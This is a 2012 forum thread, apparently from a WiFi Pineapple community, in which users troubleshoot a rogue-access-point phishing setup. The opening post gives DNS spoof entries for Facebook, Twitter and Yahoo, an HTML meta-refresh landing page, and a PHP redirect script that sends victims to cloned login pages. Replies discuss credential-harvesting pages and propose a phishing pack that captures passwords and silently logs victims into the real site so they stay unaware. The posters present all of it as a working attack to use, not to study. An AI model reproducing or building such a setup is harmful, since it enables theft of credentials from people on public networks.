CanadianTaco Posted March 27, 2012 Share Posted March 27, 2012 (edited) So I have an Pineapple (mark IV) that is set up to connect through one of my laptops that is set up for internet connection sharing. The idea is that targets can connect to whatever site they want except facebook, twitter, or yahoo. When they attempt to connect to one of these three sites they get redirected to my facebook.html, twitter.html. and Yahoo.htm. On my target laptop (using google chrome and connected to my pineapple network) I can get redirected flawlessly. In Internet Explorer or Firefox, not so much. It gets automatically redirected to the sample 'peets.html' page. DNS Spoof Host: 172.16.42.1 yahoo.com 172.16.42.1 twitter.com 172.16.42.1 facebook.com Landing page: <html> <head> <meta http-equiv="REFRESH" content="0;url=/s/redirect.php"> </head> <body> </body> </html> redirect.php: <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); } if (strpos($ref, "twitter")) { header('Location: twitter.html'); } if (strpos($ref, "yahoo")) { header('Location: Yahoo.htm'); } require('peets.html'); ?> tl;dr: Does anyone know why one browser would handle this differently than the other? or if this isn't the issue, how to go about fixing it? -edit- If it helps I saved the files using Google Chrome 'save page as' then 'Webpage, Complete'. Although I don't quite see how this could be causing the issue... Edited March 29, 2012 by CanadianTaco Quote Link to comment Share on other sites More sharing options...
PatriceKing Posted March 28, 2012 Share Posted March 28, 2012 same here. btw, did you clean up the current login pages... there's a lot of unnecessary code, for the appearance sake, and it doesn't work for me. I did a lot trying to figure out things on the Mk IV, learned tons... if there are some neat and clean login pages that'll be great, otherwise, tomorrow :) thx Quote Link to comment Share on other sites More sharing options...
CanadianTaco Posted March 28, 2012 Author Share Posted March 28, 2012 same here. btw, did you clean up the current login pages... there's a lot of unnecessary code, for the appearance sake, and it doesn't work for me. I did a lot trying to figure out things on the Mk IV, learned tons... if there are some neat and clean login pages that'll be great, otherwise, tomorrow :) thx I left the login pages as they were, except for the login form itself of course. Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted March 29, 2012 Share Posted March 29, 2012 This method of phishing was giving me mixed results also. I got better results when I just spoofed the DNS to different addresses and ports running credential harvesting pages. Just out of curiosity which browsers was this not working for? Quote Link to comment Share on other sites More sharing options...
Mark4FanGer Posted March 29, 2012 Share Posted March 29, 2012 Maybe we should create a "phisiing" pack with all files needed, i am just working on it some feature-ideas: will land on the loginpage twice (to be sure to get the right credentials) will check both inputs of both "trys" will automaticly put the credentials in the real facebookpage to log the user in well documented code ... any ideas are wellcome regards mark4fanger Quote Link to comment Share on other sites More sharing options...
CanadianTaco Posted March 29, 2012 Author Share Posted March 29, 2012 (edited) This method of phishing was giving me mixed results also. I got better results when I just spoofed the DNS to different addresses and ports running credential harvesting pages. Just out of curiosity which browsers was this not working for? I've only tested it with Google Chrome, Firefox, and Internet Explorer. And so far only Google Chrome works. The other two get automatically redirected to 'peets.html' -edit- If it helps I saved the files using Google Chrome 'save page as' then 'Webpage, Complete'. Although I don't quite see how this could be causing the issue... Edited March 29, 2012 by CanadianTaco Quote Link to comment Share on other sites More sharing options...
Technoprenerd Posted March 31, 2012 Share Posted March 31, 2012 Hey, Have this issue too. Even with the Nyan/rickrolling. My case; www.google.com gets displayed normally, and all the other pages with nyan/rickroll. I think it is in the browser settings orso... :S (Just might be helpfull) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.